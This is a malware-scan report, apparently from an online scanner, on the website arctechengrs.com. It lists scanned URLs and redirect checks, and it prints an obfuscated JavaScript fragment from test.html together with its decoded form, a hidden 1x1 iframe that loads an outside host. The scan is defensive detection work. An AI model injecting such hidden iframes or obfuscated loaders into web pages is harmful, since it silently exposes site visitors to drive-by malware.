Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=arctechengrs.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://arctechengrs.com/ | 200 OK Content-Length: 405 Content-Type: text/html | clean |
http://arctechengrs.com/cgi-bin/ | 403 Forbidden Content-Length: 452 Content-Type: text/html | clean |
http://arctechengrs.com/test404page.js | 404 Not Found Content-Length: 454 Content-Type: text/html | clean |
http://arctechengrs.com/test.html | 200 OK Content-Length: 5575 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) dWfwltHZmY='';var jTL='';var jQF=390;var nXZZ="";var fAS="";var gUTT;var yUD=57338;var bLZI="bLZI";gUTT='%10%09%1f%06%0c%1a%10%0b%2c%63%28%69%5d%6e%64%2e%5f%48%5c%4e%22%78%62%53%44%10%46%63%7a%5d%16%54%44%76%6c%6a%55%45%5e%44%7d%39%3b%53%4d%4e%40%4d%44%5d%3b%57%6e%7b%10%5f%17%51%4e%51%5d%3b%54%54%5d%16%18%0d%01%2e%2d%7c%0d%28%3b%2e%0f%4d%59%49%36%3e%4f%4e%49%54%19%56%5b%03%18%23%37%3b%51%1e%12%04%4d%17%12%0c%04%3d%32%17%3a%3c%1e%4f%50%5c%22%23%22%4d%2c%5a%01%02%10%02%5a%58%75%2c%28%16%0f%1b%14%0 Decoded script: document['w4946r8840i2250t4758e54683256'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://thatduzit.com/index.php\'></iframe>'); document['w4946r8840i2250t4758e54683256'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://thatduzit.com/index.php\'></iframe>'); /*** called setTimeout with document['w4946r8840i2250t4758e54683256'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://thatduzit.com/index.php\'></iframe>');, 303 */ <iframe width=1 height=1 border=0 frameborder=0 src='http://thatduzit.com/index.php'></iframe> Antivirus reports:
| ||
http://kako-koristiti.com/css/results_ok.php | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
http://arctechengrs.com/test.pl | 500 Internal Server Error Content-Length: 781 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: arctechengrs.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 11 Sep 2014 17:34:24 GMT
Server: Apache/2.4.6 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Length: 405
Content-Type: text/html;charset=ISO-8859-1
...405 bytes of data.
GET / HTTP/1.1
Host: arctechengrs.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 11 Sep 2014 17:34:24 GMT
Server: Apache/2.4.6 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Length: 405
Content-Type: text/html;charset=ISO-8859-1
...405 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: arctechengrs.com
Referer: http://www.google.com/search?q=arctechengrs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: arctechengrs.com
Referer: http://www.google.com/search?q=arctechengrs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.